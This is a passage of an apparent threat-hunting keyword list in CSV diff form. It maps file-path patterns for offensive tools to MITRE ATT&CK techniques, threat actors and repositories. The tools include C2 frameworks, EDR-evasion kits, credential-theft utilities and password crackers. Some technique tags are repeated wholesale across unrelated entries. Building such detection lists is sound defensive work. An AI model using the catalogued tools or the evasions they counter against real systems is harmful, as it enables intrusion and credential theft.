TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/opt/rai/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*/opt/seclists/Discovery/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/optiv/Dent/*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z"
+"*/optiv/Freeze/*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
+"*/oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/orbitaldump.git*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z"
+"*/oscp.profile*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z"
+"*/out:spacerunner.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*/outfile:C:\ProgramData\hashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/outflanknl/*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
+"*/output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*/output/ratchatPT*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*/ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/OWASP*","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Web Attacks","https://github.com/OWASP","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/p_cve-2014-9322.tar.gz*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/p292/Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*/p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/package/portscan/*.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" 
+"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/padre/pkg/exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*/paensy.cpp*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*/papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*/paranoidninja/*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" +"*/parrot/iso/*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrot-mirror/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrot-on-docker/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/parrotsec/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*/parsers/nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*/passhash.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*/passive_sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/password/mimipenguin/*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/password_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/path_traversal.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/path_traversal_win32.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/payload_scripts*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - 